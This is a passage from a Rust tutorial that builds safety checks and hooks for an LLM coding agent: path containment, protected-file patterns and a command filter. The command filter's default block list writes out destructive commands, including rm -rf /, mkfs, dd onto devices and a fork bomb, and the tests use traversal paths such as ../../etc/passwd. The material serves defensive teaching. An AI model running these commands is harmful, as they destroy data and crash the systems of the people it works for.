Chapter 14 adds safety checks -- static analysis of tool arguments that catches dangerous patterns before the permission prompt even appears. It validates paths against allowed directories, matches filenames against protected patterns (.env, .git/config), and filters bash commands for blocked patterns (rm -rf /, sudo, fork bombs). Safety checks wrap tools so that dangerous calls are blocked before they execute.

Check yourself



Chapter 14: Safety Checks

File(s) to edit: src/safety.rs
Test to run: cargo test -p mini-claw-code-starter safety
Estimated time: 40 min

The permission engine from Chapter 13 gates every tool call -- it decides whether to allow, deny, or ask the user before execution proceeds. But it makes that decision based on the tool, not the arguments. A write call in auto mode is allowed regardless of whether the target path is src/main.rs or .env. A bash call in default mode prompts the user whether the command is ls or rm -rf /. The permission engine knows who is knocking. It does not look at what they are carrying.

Safety checks fill that gap. The SafetyChecker performs static analysis on tool arguments before the permission engine runs. It examines the actual path being written or the actual command being executed, and blocks operations that are dangerous regardless of what the permission mode says. This is defense-in-depth: even if the permission engine would allow a tool call, the safety checker can still reject it.

Why two layers? Because they protect against different failure modes. The permission engine protects against the LLM doing things the user did not authorize. The safety checker protects against the LLM doing things that are never safe -- writing to .env, running rm -rf /, executing a fork bomb. A user who sets bypass mode is saying "I trust the agent." The safety checker says "trust has limits."

cargo test -p mini-claw-code-starter safety

Goal

  • Implement PathValidator to confine file operations to a single directory tree, blocking path traversal attacks like ../../etc/passwd.
  • Implement CommandFilter to block dangerous shell commands (rm -rf /, sudo, fork bombs) using glob pattern matching.
  • Implement ProtectedFileCheck to prevent writes and edits to sensitive files matching protected patterns (.env, .git/config).
  • Wire all checks together through SafeToolWrapper so that any single safety failure blocks the tool call and returns a descriptive error to the LLM.

The SafetyCheck trait and implementations

The safety system lives in src/safety.rs. Unlike the reference implementation, which uses a single SafetyChecker struct, the starter uses a trait-based design with three focused implementations and a wrapper.

The SafetyCheck trait

#![allow(unused)]
fn main() {
pub trait SafetyCheck: Send + Sync {
    fn check(&self, tool_name: &str, args: &Value) -> Result<(), String>;
}
}

Each safety check implements this trait. It receives the tool name and arguments, and returns Ok(()) to allow execution or Err(reason) to block it. The trait requires Send + Sync because safety checks are stored inside SafeToolWrapper, which implements Tool and may be shared across async tasks.

Key Rust concept: Send + Sync trait bounds

The Send + Sync bounds on SafetyCheck are required because tools live inside Box<dyn Tool>, which is stored in a HashMap that the agent holds. In an async runtime like tokio, the agent's futures may be moved between threads. Send means the type can be transferred to another thread. Sync means &self references can be shared between threads. Together they guarantee that the safety check can be called from any async task without data races. Without these bounds, the compiler would refuse to store Box<dyn SafetyCheck> inside SafeToolWrapper, because SafeToolWrapper itself must be Send + Sync to satisfy the Tool trait.

PathValidator

#![allow(unused)]
fn main() {
pub struct PathValidator {
    allowed_dir: PathBuf,
    raw_dir: PathBuf,
}
}

The PathValidator confines file operations to a single directory tree. It canonicalizes the allowed directory at construction time, then validates each path argument against it. The agent cannot write to /etc/passwd or edit ~/.ssh/authorized_keys even if the LLM asks nicely.

The validate_path method resolves relative paths against raw_dir, canonicalizes the result (or its parent for new files), and checks starts_with against allowed_dir. The SafetyCheck implementation only fires for tools that take a path argument (read, write, edit).
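The containment idea can be sketched without touching the filesystem. This hypothetical is_inside helper normalizes "." and ".." components lexically instead of calling canonicalize (which the real validate_path uses, and which additionally resolves symlinks against the actual filesystem):

```rust
use std::path::{Component, Path, PathBuf};

// Sketch: resolve a candidate path against an allowed directory and check
// that it stays inside. Lexical normalization only -- symlinks not handled.
fn is_inside(allowed_dir: &Path, candidate: &str) -> bool {
    let target = Path::new(candidate);
    let resolved: PathBuf = if target.is_absolute() {
        target.to_path_buf()
    } else {
        allowed_dir.join(target)
    };
    // Collapse "." and ".." without hitting the filesystem.
    let mut normalized = PathBuf::new();
    for comp in resolved.components() {
        match comp {
            Component::ParentDir => { normalized.pop(); }
            Component::CurDir => {}
            other => normalized.push(other),
        }
    }
    normalized.starts_with(allowed_dir)
}

fn main() {
    let allowed = Path::new("/project");
    assert!(is_inside(allowed, "src/main.rs"));        // relative, inside
    assert!(!is_inside(allowed, "../../etc/passwd"));  // traversal escapes
    assert!(!is_inside(allowed, "/etc/passwd"));       // absolute, outside
}
```

The traversal case shows why normalization must happen before the starts_with check: the raw joined path /project/../../etc/passwd does begin with /project as a string.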

CommandFilter

#![allow(unused)]
fn main() {
pub struct CommandFilter {
    blocked_patterns: Vec<glob::Pattern>,
}
}

The CommandFilter checks bash commands against a list of blocked glob patterns. rm -rf / deletes everything. sudo escalates privileges. :(){:|:&};: is a fork bomb that crashes the system. These are never safe to run, regardless of context.

The default_filters() constructor provides a sensible starting point:

#![allow(unused)]
fn main() {
pub fn default_filters() -> Self {
    Self::new(&[
        "rm -rf /".into(),
        "rm -rf /*".into(),
        "sudo *".into(),
        "> /dev/sda*".into(),
        "mkfs.*".into(),
        "dd if=*of=/dev/*".into(),
        ":(){:|:&};:".into(),
    ])
}
}

ProtectedFileCheck

#![allow(unused)]
fn main() {
pub struct ProtectedFileCheck {
    patterns: Vec<glob::Pattern>,
}
}

The ProtectedFileCheck blocks writes and edits to files matching protected glob patterns. It checks both the full path and just the filename against each pattern, so a pattern like .env matches /project/.env regardless of directory.
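The dual match -- full path or bare filename -- can be sketched with exact string comparison standing in for glob patterns. This is_protected helper is hypothetical, not the starter's API:

```rust
use std::path::Path;

// Sketch of the ProtectedFileCheck matching logic with exact names in
// place of glob::Pattern: a pattern blocks a file if it matches either
// the full path or just the filename.
fn is_protected(path: &str, protected: &[&str]) -> bool {
    let file_name = Path::new(path)
        .file_name()
        .and_then(|n| n.to_str())
        .unwrap_or("");
    protected.iter().any(|p| *p == path || *p == file_name)
}

fn main() {
    assert!(is_protected("/project/.env", &[".env"]));      // filename match
    assert!(!is_protected("/project/env.rs", &[".env"]));   // no match
    assert!(is_protected(".git/config", &[".git/config"])); // full-path match
}
```

Checking the filename as well as the full path is what lets a short pattern like ".env" protect that file in any directory.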


The SafeToolWrapper

The SafeToolWrapper is the glue that connects safety checks to the tool system:

#![allow(unused)]
fn main() {
pub struct SafeToolWrapper {
    inner: Box<dyn Tool>,
    checks: Vec<Box<dyn SafetyCheck>>,
}
}

It wraps a Box<dyn Tool> with a Vec<Box<dyn SafetyCheck>>. When call() is invoked, it runs all safety checks first. If any check returns Err, the wrapper returns Ok(format!("error: safety check failed: {reason}")) -- note that it returns Ok with an error message string, not Err. This is because in the starter, Tool::call returns anyhow::Result<String>, and a safety denial is not a system error -- it is a controlled rejection that the LLM should see and adapt to.

#![allow(unused)]
fn main() {
#[async_trait]
impl Tool for SafeToolWrapper {
    fn definition(&self) -> &ToolDefinition {
        self.inner.definition()
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        // Run all safety checks. If any returns Err, return the error as a string.
        // Otherwise, call the inner tool.
        unimplemented!()
    }
}
}
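Stripped of the async Tool trait, the check-then-call pattern looks like this (checked_call is a hypothetical synchronous stand-in; the real wrapper awaits inner.call(args)):

```rust
// Sketch: run every check; the first failure becomes an Ok-style error
// string for the LLM rather than a hard Err.
type Check = Box<dyn Fn(&str) -> Result<(), String>>;

fn checked_call(checks: &[Check], args: &str, inner: impl Fn(&str) -> String) -> String {
    for check in checks {
        if let Err(reason) = check(args) {
            // Controlled rejection: the model sees this text and can adapt.
            return format!("error: safety check failed: {reason}");
        }
    }
    inner(args) // all checks passed; run the wrapped tool
}

fn main() {
    let checks: Vec<Check> = vec![Box::new(|args: &str| {
        if args.contains("rm -rf /") {
            Err("blocked command".to_string())
        } else {
            Ok(())
        }
    })];

    assert_eq!(checked_call(&checks, "ls", |a| format!("ran: {a}")), "ran: ls");
    assert_eq!(
        checked_call(&checks, "rm -rf /", |a| format!("ran: {a}")),
        "error: safety check failed: blocked command"
    );
}
```

Both outcomes are ordinary strings, which is the point: a blocked call flows back to the model through the same channel as a successful one.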

The with_check convenience constructor wraps a single check:

#![allow(unused)]
fn main() {
pub fn with_check(tool: Box<dyn Tool>, check: impl SafetyCheck + 'static) -> Self {
    Self::new(tool, vec![Box::new(check)])
}
}

This design means safety checks are composable. You can wrap a tool with a PathValidator, a CommandFilter, and a ProtectedFileCheck all at once -- each runs independently, and any single failure blocks the call.


How the checks dispatch

flowchart LR
    A["SafeToolWrapper.call(args)"] --> B["PathValidator"]
    A --> C["CommandFilter"]
    A --> D["ProtectedFileCheck"]
    B -->|"read/write/edit"| E{"Path inside<br/>allowed_dir?"}
    C -->|"bash"| F{"Command<br/>matches blocked<br/>pattern?"}
    D -->|"write/edit"| G{"Filename<br/>matches protected<br/>pattern?"}
    E -->|No| H["Err: blocked"]
    E -->|Yes| I["Ok"]
    F -->|Yes| H
    F -->|No| I
    G -->|Yes| H
    G -->|No| I
    I --> J["Inner tool.call(args)"]
    H --> K["Return error string<br/>to LLM"]

Each SafetyCheck implementation decides which tools it applies to by matching on the tool_name parameter in its check method:

  • PathValidator -- Fires for read, write, and edit. Extracts the path argument and validates it against the allowed directory.
  • CommandFilter -- Fires only for bash. Extracts the command argument and checks it against blocked patterns.
  • ProtectedFileCheck -- Fires for write and edit. Extracts the path argument and checks both the full path and filename against protected patterns.

Tools that do not match any check pass through unchecked. Read-only tools like read are checked by PathValidator (to enforce directory boundaries) but not by ProtectedFileCheck (reading .env is not dangerous -- the danger is in writing to sensitive files).

Each check returns Ok(()) for tools it does not handle, so wrapping a tool with an irrelevant check is harmless -- it just passes through.


Path validation

The PathValidator::validate_path method implements directory containment checking:

#![allow(unused)]
fn main() {
pub fn validate_path(&self, path: &str) -> Result<(), String> {
    let target = Path::new(path);

    // Step 1: resolve to absolute path
    let resolved = if target.is_absolute() {
        target.to_path_buf()
    } else {
        self.raw_dir.join(target)
    };

    // Step 2: canonicalize (resolves symlinks and ..)
    let canonical = if resolved.exists() {
        resolved.canonicalize()
            .map_err(|e| format!("cannot resolve path: {e}"))?
    } else {
        // For new files, canonicalize the parent directory
        let parent = resolved.parent().ok_or("invalid path")?;
        if parent.exists() {
            let mut c = parent.canonicalize()
                .map_err(|e| format!("cannot resolve parent: {e}"))?;
            if let Some(filename) = resolved.file_name() {
                c.push(filename);
            }
            c
        } else {
            return Err(format!("parent directory does not exist: {}",
                parent.display()));
        }
    };

    // Step 3: check containment
    if canonical.starts_with(&self.allowed_dir) {
        Ok(())
    } else {
        Err(format!("path {} is outside allowed directory {}",
            canonical.display(), self.allowed_dir.display()))
    }
}
}

The key steps:

  1. Resolve relative paths against raw_dir to get an absolute path.
  2. Canonicalize the target. If the file exists, canonicalize it directly. If not, canonicalize the parent directory and append the filename. This handles the common case of writing a new file in an existing directory.
  3. Check starts_with against the canonicalized allowed_dir.

This is more robust than a simple prefix match because canonicalization resolves .. components and symlinks. A path like /project/../etc/passwd gets resolved to /etc/passwd, which fails the starts_with check against /project.
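A runnable sketch of steps 2 and 3 shows why. This version only handles paths that already exist (the starter additionally canonicalizes the parent for new files), but it demonstrates that `..` is resolved before the prefix check:

```rust
use std::path::{Path, PathBuf};

// Canonicalize, then check containment. Only handles existing paths;
// unresolvable paths are simply rejected.
fn is_contained(path: &str, allowed: &Path) -> bool {
    match Path::new(path).canonicalize() {
        Ok(canonical) => canonical.starts_with(allowed),
        Err(_) => false,
    }
}

fn main() {
    let allowed: PathBuf = Path::new("/tmp").canonicalize().unwrap();
    // `..` is resolved before the prefix check, so traversal is caught.
    assert!(!is_contained("/tmp/../etc", &allowed));
    assert!(is_contained("/tmp", &allowed));
}
```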


Protected file pattern matching

The ProtectedFileCheck uses glob::Pattern for matching. For each write or edit call, it extracts the path argument and checks both the full path and just the filename against each pattern:

#![allow(unused)]
fn main() {
fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> {
    match tool_name {
        "write" | "edit" => {
            if let Some(path) = args.get("path").and_then(|v| v.as_str()) {
                for pattern in &self.patterns {
                    // Check full path and filename separately
                    if pattern.matches(path)
                        || pattern.matches(
                            Path::new(path).file_name()
                                .unwrap_or_default()
                                .to_str().unwrap_or(""),
                        )
                    {
                        return Err(format!(
                            "file `{path}` is protected (matches pattern `{}`)",
                            pattern.as_str()
                        ));
                    }
                }
                Ok(())
            } else {
                Ok(())
            }
        }
        _ => Ok(()),
    }
}
}

Checking both the full path and the filename is important. A pattern like .env should match /project/.env whether you write the pattern as a full path glob or a simple filename. The glob::Pattern crate handles the actual matching, giving us proper glob semantics including wildcards and character classes.
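The dual check can be seen in miniature below, with exact string comparison standing in for `glob::Pattern::matches` (the starter uses real glob matching, so wildcards work too):

```rust
use std::path::Path;

// Check a pattern against both the full path and the bare filename.
// Exact equality here is a stand-in for pattern.matches().
fn dual_match(path: &str, pattern: &str) -> bool {
    let filename = Path::new(path)
        .file_name()
        .and_then(|f| f.to_str())
        .unwrap_or("");
    path == pattern || filename == pattern
}

fn main() {
    // A bare-filename pattern catches the file in any directory...
    assert!(dual_match("/project/.env", ".env"));
    // ...and at the top level, where path and filename coincide.
    assert!(dual_match(".env", ".env"));
    assert!(!dual_match("/project/src/main.rs", ".env"));
}
```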


Command filtering

The CommandFilter::is_blocked method checks a command against blocked glob patterns:

#![allow(unused)]
fn main() {
pub fn is_blocked(&self, command: &str) -> Option<&str> {
    // Trim command, check against each pattern, return matching pattern
    unimplemented!()
}
}

Unlike the reference implementation which uses substring matching, the starter uses glob::Pattern for command matching. This gives more expressive pattern support -- "sudo *" matches any command starting with sudo followed by arguments, while "rm -rf /*" matches the specific dangerous pattern.
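One possible shape for is_blocked, with a tiny trailing-`*` matcher standing in for glob::Pattern (the starter compiles real globs, so character classes and mid-pattern wildcards also work):

```rust
// Minimal matcher: supports an exact match or a trailing `*` wildcard,
// which covers patterns like "sudo *". A stand-in for glob::Pattern.
fn pattern_matches(pattern: &str, command: &str) -> bool {
    match pattern.strip_suffix('*') {
        Some(prefix) => command.starts_with(prefix),
        None => command == pattern,
    }
}

// Trim the command, check each pattern, return the first match.
fn is_blocked<'a>(patterns: &'a [String], command: &str) -> Option<&'a str> {
    let cmd = command.trim();
    patterns
        .iter()
        .find(|p| pattern_matches(p.as_str(), cmd))
        .map(|p| p.as_str())
}

fn main() {
    let patterns = vec!["sudo *".to_string(), "rm -rf /".to_string()];
    assert_eq!(is_blocked(&patterns, "sudo rm file"), Some("sudo *"));
    assert_eq!(is_blocked(&patterns, "  rm -rf /  "), Some("rm -rf /"));
    assert_eq!(is_blocked(&patterns, "ls -la"), None);
}
```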

The SafetyCheck implementation only fires for the bash tool:

#![allow(unused)]
fn main() {
fn check(&self, tool_name: &str, args: &Value) -> Result<(), String> {
    // Only check 'bash' tool, extract command, call is_blocked
    unimplemented!()
}
}

The limitations are similar to any pattern-based approach: it can produce false positives (blocking harmless commands that match a pattern) and false negatives (missing dangerous commands that use different syntax). For a tutorial, pattern matching is the right trade-off -- it demonstrates the architecture without the complexity of shell parsing.


How Claude Code does it

Claude Code's safety checking is considerably more sophisticated, operating at multiple levels:

Command classification with parsing. Rather than flat pattern matching, Claude Code classifies commands using regex patterns combined with shell AST parsing. It understands that rm -rf / and rm -r -f / and command rm -rf / are the same operation. It parses pipes and redirects to check each command in a pipeline separately. Our glob approach is a flat string match -- no structure, no parsing.

Path normalization and symlink resolution. Claude Code resolves ../, ~, environment variables, and symbolic links before checking paths. A path like $HOME/../../../etc/passwd gets normalized to /etc/passwd before the directory check runs. Our PathValidator canonicalizes paths, which catches ../ components and symlinks, but it does not expand ~ or environment variables -- a path written that way fails to resolve and is rejected rather than normalized.

Git-aware protected paths. Claude Code considers git status when deciding what to protect. An untracked .env file (one that is not in the repository) gets stronger protection than a tracked one -- if it is untracked, it likely contains real secrets that were intentionally excluded from version control. Our implementation treats all .env files the same.

Severity levels. Claude Code distinguishes between operations that should be warned about and operations that should be blocked. Writing to .env might produce a warning that the user can override. Running rm -rf / is an unconditional block. Our Permission::Deny is a single severity -- blocked, no override.

The gap between our implementation and Claude Code's is intentional. Glob matching and canonicalized prefix checking are easy to reason about and easy to test. They demonstrate the architecture of safety checking -- a separate layer that inspects arguments before the permission engine runs -- without the complexity of shell parsing and full path resolution. If you understand how SafetyChecker fits into the pipeline, you understand how Claude Code's safety system fits. The sophistication of the individual checks is an implementation detail.


Where safety checks fit in the pipeline

To see the complete picture, here is how safety checks and the permission engine compose. In the starter, safety checks are embedded inside the tool via SafeToolWrapper. When the SimpleAgent dispatches a tool call:

LLM requests tool call
    |
    v
PermissionEngine.evaluate(tool_name, args)
    |--- Deny? --> block, return error to LLM
    |--- Ask?  --> prompt user
    |--- Allow? --> continue
    v
SafeToolWrapper.call(args)
    |--- SafetyCheck fails? --> return Ok("error: ...") to LLM
    |--- All checks pass?   --> continue
    v
Inner Tool.call(args)
    |
    v
Return result to LLM

In this design, the permission engine runs first (deciding whether the tool should run at all), and the safety checks run inside the tool call itself. The SafeToolWrapper catches dangerous arguments even when the permission engine allows the call. The wrapper returns an error string (not an Err) so the LLM sees the rejection reason and can adjust its approach.

This means safety checks are the inner defense layer. Even with allow_all() permission mode, a tool wrapped with SafeToolWrapper will still block writes to .env or commands containing rm -rf /. The safety wrapper is the floor that no permission configuration can lower.


Tests

Run the safety check tests:

cargo test -p mini-claw-code-starter safety

Key tests:

  • test_safety_path_within_allowed -- A file inside the allowed directory passes validation.
  • test_safety_path_outside_allowed -- /etc/passwd is rejected when the allowed directory is a temp dir.
  • test_safety_path_traversal_blocked -- A ../../etc/passwd traversal path is resolved and rejected.
  • test_safety_path_new_file_in_allowed -- A new (not-yet-existing) file in the allowed directory passes validation.
  • test_safety_safety_check_read_tool -- PathValidator fires for the read tool and validates the path argument.
  • test_safety_safety_check_ignores_bash -- PathValidator skips the bash tool (no path argument to check).
  • test_safety_command_filter_blocks_rm_rf -- rm -rf / and rm -rf /* are both caught.
  • test_safety_command_filter_blocks_sudo -- sudo rm file matches the sudo * pattern.
  • test_safety_command_filter_allows_safe -- ls -la, echo hello, and cargo test pass through.
  • test_safety_protected_file_blocks_env -- Writes to .env and .env.local are blocked.
  • test_safety_protected_file_allows_normal -- Writes to src/main.rs pass through.
  • test_safety_wrapper_blocks_on_check_failure -- SafeToolWrapper returns an "error: safety check failed" string when a check fails.
  • test_safety_wrapper_allows_valid_call -- SafeToolWrapper passes through to the inner tool when all checks pass.
  • test_safety_custom_blocked_commands -- Custom blocked patterns (docker rm *, npm publish*) work correctly.

Key takeaway

Safety checks inspect tool arguments, not tool identity. The permission engine asks "should this tool run at all?" while safety checks ask "is this specific invocation dangerous?" The two layers compose through defense-in-depth: even with all permissions granted, SafeToolWrapper still blocks writes to .env and commands matching rm -rf /.


Recap

The safety system adds a second layer of defense between the LLM and tool execution:

  • Trait-based design -- The SafetyCheck trait allows composable, independent checks. PathValidator, CommandFilter, and ProtectedFileCheck each handle one concern.
  • Argument-level inspection -- Unlike the permission engine which checks tool identity, safety checks examine the actual arguments: which file is being written, which command is being run.
  • SafeToolWrapper -- Wraps any Box<dyn Tool> with a Vec<Box<dyn SafetyCheck>>. Returns Ok("error: ...") on failure, not Err, so the LLM sees the rejection and can adapt.
  • Glob-based matching -- Both CommandFilter and ProtectedFileCheck use glob::Pattern for pattern matching, giving expressive matching without custom code.
  • Path canonicalization -- PathValidator canonicalizes paths before checking, preventing bypass via .. components or symlinks.
  • Defense-in-depth -- Safety checks run inside the tool call. Even with allow_all() permission mode, wrapped tools still enforce safety rules.

The architecture -- composable checks that inspect arguments and wrap tools -- demonstrates the same defense-in-depth pattern that Claude Code uses.

What's next

In Chapter 15: Hook System you will build pre-tool and post-tool hooks -- shell commands that run before and after tool execution. Hooks let users enforce custom policies beyond what the built-in safety checker covers: run a linter after every edit, block writes to specific directories, log every bash command. Where the safety checker is a built-in guard, hooks are user-defined guards.

Check yourself


← Chapter 13: Permission Engine · Contents · Chapter 15: Hooks →

Chapter 15: Hooks

File(s) to edit: src/hooks.rs
Test to run: cargo test -p mini-claw-code-starter hooks
Estimated time: 40 min

The permission engine from Chapter 13 decides whether a tool call runs. The safety checks from Chapter 14 catch dangerous patterns before the user even sees a prompt. But both systems are baked into the agent -- they enforce rules that you, the developer, chose at compile time. What about the user?

Users have policies that the agent author cannot anticipate. A team might require that every bash command is logged to an audit file. A project might enforce that file writes only touch a specific directory. A CI pipeline might need to run a linter after every edit. These are not safety checks in the "prevent rm -rf /" sense -- they are workflow hooks that extend the agent's behavior at runtime.

This chapter builds the hook system. Hooks are event-driven: they fire at key lifecycle points (before a tool call, after a tool call, when the agent starts, when it ends) and they can observe, modify, or block execution. The trait-based design means anyone can implement a hook -- a logging hook for debugging, a blocking hook for policy enforcement, a shell hook that delegates decisions to external commands.

cargo test -p mini-claw-code-starter hooks

Goal

  • Define the HookEvent enum with four lifecycle points (AgentStart, PreToolCall, PostToolCall, AgentEnd) that carry contextual data.
  • Implement the Hook trait and HookRegistry dispatch logic where Block short-circuits, ModifyArgs accumulates, and Continue is the default.
  • Build three concrete hooks: LoggingHook (observe all events), BlockingHook (deny specific tools), and ShellHook (delegate to external commands).
  • Ensure hooks compose correctly -- registration order determines priority, and blocking hooks prevent later hooks from running.

The event model

Before writing any code, let's define when hooks fire. The agent loop from Chapter 7 has a clear lifecycle:

User prompt arrives
  -> AgentStart
  -> Provider returns tool calls
    -> PreToolCall (for each tool)
    -> Tool executes
    -> PostToolCall (for each tool)
  -> Provider returns final answer
  -> AgentEnd
sequenceDiagram
    participant Agent
    participant Registry as HookRegistry
    participant Tool

    Agent->>Registry: dispatch(AgentStart)
    loop For each tool call
        Agent->>Registry: dispatch(PreToolCall)
        alt Block returned
            Registry-->>Agent: Block(reason)
            Agent->>Agent: Return error to LLM
        else Continue/ModifyArgs
            Registry-->>Agent: Continue or ModifyArgs
            Agent->>Tool: tool.call(args)
            Tool-->>Agent: result
            Agent->>Registry: dispatch(PostToolCall)
        end
    end
    Agent->>Registry: dispatch(AgentEnd)

Four events, four points where external code can intervene:

| Event | When it fires | What hooks can do |
|---|---|---|
| AgentStart | Before the first provider call | Log the prompt, initialize state |
| PreToolCall | Before each tool execution | Block the call, modify arguments |
| PostToolCall | After each tool execution | Log the result, trigger follow-up actions |
| AgentEnd | After the final response | Log the response, clean up state |

The asymmetry is deliberate. PreToolCall can block or modify because the tool has not run yet -- there is still time to intervene. PostToolCall cannot block because the tool already ran -- blocking at this point would be meaningless. It can only observe.


Core types

Open src/hooks.rs. The module defines three types: HookEvent, HookAction, and the Hook trait.

HookEvent

#![allow(unused)]
fn main() {
#[derive(Debug, Clone)]
pub enum HookEvent {
    PreToolCall {
        tool_name: String,
        args: Value,
    },
    PostToolCall {
        tool_name: String,
        args: Value,
        result: String,
    },
    AgentStart {
        prompt: String,
    },
    AgentEnd {
        response: String,
    },
}
}

Each variant carries the data relevant to its lifecycle point. PreToolCall carries the tool name and arguments -- everything a hook needs to decide whether to allow or modify the call. PostToolCall adds the result string. AgentStart and AgentEnd carry the user prompt and final response respectively.

The enum derives Clone so that hooks which need to retain event data can copy it. The HookRegistry itself passes events by shared reference (&HookEvent) to each hook in sequence, so hooks that only inspect events (like the BlockingHook) borrow without cloning. (The starter's LoggingHook sidesteps cloning entirely by recording string descriptions instead of the events themselves.)

HookAction

#![allow(unused)]
fn main() {
#[derive(Debug, Clone, PartialEq)]
pub enum HookAction {
    Continue,
    Block(String),
    ModifyArgs(Value),
}
}

Three possible responses, ordered by severity:

  • Continue -- the default. The hook has nothing to say. Execution proceeds normally.
  • Block(reason) -- stop the tool call. The reason string is returned to the LLM as an error message so it can understand why the call was rejected and adjust its approach.
  • ModifyArgs(new_args) -- replace the tool's arguments before execution. This is how hooks can inject defaults, normalize paths, or enforce constraints without blocking the call entirely.

HookAction derives PartialEq so tests can assert on specific actions with assert_eq!. This is purely a testing convenience -- the runtime uses pattern matching, not equality checks.

The Hook trait

#![allow(unused)]
fn main() {
#[async_trait]
pub trait Hook: Send + Sync {
    async fn on_event(&self, event: &HookEvent) -> HookAction;
}
}

One method. It receives an event reference and returns an action. The trait requires Send + Sync because hooks live inside the HookRegistry and the registry may be shared across async tasks. The async_trait attribute handles the usual ceremony of boxing the returned future.

This is the same pattern as the Tool trait from Chapter 6 -- a single async method that takes structured input and returns structured output. The difference is scope: tools interact with the outside world (filesystem, shell), while hooks interact with the agent's own execution.


The HookRegistry

Individual hooks are useful, but the real value is composing them. The HookRegistry holds a list of hooks and dispatches events to them sequentially.

#![allow(unused)]
fn main() {
pub struct HookRegistry {
    hooks: Vec<Box<dyn Hook>>,
}

impl HookRegistry {
    pub fn new() -> Self {
        Self { hooks: Vec::new() }
    }

    pub fn register(&mut self, hook: impl Hook + 'static) {
        self.hooks.push(Box::new(hook));
    }

    pub fn with(mut self, hook: impl Hook + 'static) -> Self {
        self.register(hook);
        self
    }

    pub fn is_empty(&self) -> bool {
        self.hooks.is_empty()
    }
}
}

The builder API should look familiar -- it mirrors ToolSet from Chapter 4. The with() method takes ownership and returns self for chaining. The register() method takes &mut self for imperative code. Both accept impl Hook + 'static, boxing the concrete type into a trait object.

The dispatch method

The interesting part is how actions compose:

#![allow(unused)]
fn main() {
pub async fn dispatch(&self, event: &HookEvent) -> HookAction {
    // Iterate hooks in order
    // If any hook returns Block, return Block immediately
    // If any hook returns ModifyArgs, remember the new args
    // If all hooks return Continue (and no ModifyArgs), return Continue
    unimplemented!()
}
}

Three rules:

  1. Block short-circuits. The moment any hook returns Block, the registry stops and returns that action immediately. Later hooks never see the event. This is the right behavior -- if a policy says "no bash," there is no point asking the logging hook for its opinion.

  2. ModifyArgs accumulates. If multiple hooks return ModifyArgs, the last one wins. Each hook that modifies arguments overwrites the previous modification. This is simple but effective -- if you need more complex composition (merging argument objects), you can implement it in a single hook that encapsulates the logic.

  3. Continue is the default. If no hook has an opinion, execution proceeds unchanged. An empty registry always returns Continue.

The sequential evaluation order means hook priority is determined by registration order. Hooks registered first run first. If you want a blocking hook to take precedence over a logging hook, register it first.
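The three rules can be sketched with a synchronous stand-in for the async trait (a String stands in for serde_json::Value as the argument payload):

```rust
#[derive(Debug, Clone, PartialEq)]
enum HookAction {
    Continue,
    Block(String),
    ModifyArgs(String), // String stands in for serde_json::Value
}

// Synchronous stand-in for the async Hook trait; the dispatch
// rules are the point, not the async plumbing.
trait Hook {
    fn on_event(&self, event: &str) -> HookAction;
}

fn dispatch(hooks: &[Box<dyn Hook>], event: &str) -> HookAction {
    let mut modified: Option<String> = None;
    for hook in hooks {
        match hook.on_event(event) {
            // Rule 1: Block short-circuits; later hooks never run.
            HookAction::Block(reason) => return HookAction::Block(reason),
            // Rule 2: ModifyArgs accumulates; last writer wins.
            HookAction::ModifyArgs(args) => modified = Some(args),
            HookAction::Continue => {}
        }
    }
    // Rule 3: Continue is the default when nothing modified args.
    match modified {
        Some(args) => HookAction::ModifyArgs(args),
        None => HookAction::Continue,
    }
}

// Test fixture: a hook that always returns the same action.
struct Always(HookAction);
impl Hook for Always {
    fn on_event(&self, _event: &str) -> HookAction {
        self.0.clone()
    }
}

fn main() {
    let hooks: Vec<Box<dyn Hook>> = vec![
        Box::new(Always(HookAction::ModifyArgs("a".into()))),
        Box::new(Always(HookAction::ModifyArgs("b".into()))),
    ];
    // Last ModifyArgs wins.
    assert_eq!(dispatch(&hooks, "pre"), HookAction::ModifyArgs("b".into()));

    let hooks: Vec<Box<dyn Hook>> = vec![
        Box::new(Always(HookAction::Block("no".into()))),
        Box::new(Always(HookAction::ModifyArgs("c".into()))),
    ];
    // Block short-circuits before the second hook is consulted.
    assert_eq!(dispatch(&hooks, "pre"), HookAction::Block("no".into()));
}
```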


Built-in hooks

The module provides three ready-made hooks. Each demonstrates a different pattern of hook usage.

LoggingHook

#![allow(unused)]
fn main() {
pub struct LoggingHook {
    log: std::sync::Mutex<Vec<String>>,
}

impl LoggingHook {
    pub fn new() -> Self {
        Self {
            log: std::sync::Mutex::new(Vec::new()),
        }
    }

    pub fn messages(&self) -> Vec<String> {
        self.log.lock().unwrap().clone()
    }
}

#[async_trait]
impl Hook for LoggingHook {
    async fn on_event(&self, event: &HookEvent) -> HookAction {
        // Format as "pre:{tool_name}", "post:{tool_name}", "agent:start", "agent:end"
        unimplemented!()
    }
}
}

The simplest possible hook: record a short description of every event, never interfere. It always returns Continue, meaning it never blocks or modifies anything. The Mutex<Vec<String>> allows interior mutability -- the on_event method takes &self (not &mut self), so we need a lock to push into the vector.

Key Rust concept: Mutex for interior mutability in async code

The Hook trait requires &self (not &mut self) because the registry holds hooks by shared reference. But LoggingHook needs to mutate its internal log. The solution is std::sync::Mutex<Vec<String>> -- a lock that provides mutual exclusion. When on_event calls self.log.lock().unwrap(), it gets exclusive access to the Vec, pushes a message, and drops the lock when the guard goes out of scope.

Why std::sync::Mutex and not tokio::sync::Mutex? Because the lock is held only for a push operation -- microseconds, no .await inside the critical section. The standard library Mutex is faster for short, synchronous critical sections. You only need tokio::sync::Mutex when you must hold the lock across an .await point.
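The pattern in isolation, as a minimal std-only sketch: a method that takes &self yet mutates state through a Mutex, holding the lock only for the duration of the push:

```rust
use std::sync::Mutex;

// Interior mutability: &self methods mutate through the Mutex.
struct Log {
    entries: Mutex<Vec<String>>,
}

impl Log {
    fn push(&self, msg: &str) {
        // Lock, push, and drop the guard at the end of the statement;
        // no .await is held across the critical section.
        self.entries.lock().unwrap().push(msg.to_string());
    }

    fn messages(&self) -> Vec<String> {
        self.entries.lock().unwrap().clone()
    }
}

fn main() {
    let log = Log { entries: Mutex::new(Vec::new()) };
    log.push("pre:bash");
    log.push("post:bash");
    assert_eq!(log.messages(), vec!["pre:bash", "post:bash"]);
}
```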

In the starter, the LoggingHook records string descriptions rather than cloned events. The format is compact: "pre:bash", "post:write", "agent:start", "agent:end". This makes test assertions simpler -- you compare strings rather than matching enum variants.

The LoggingHook is invaluable for testing. You can construct a registry with a LoggingHook, fire some events, and then inspect what was recorded. This is exactly what the tests do.
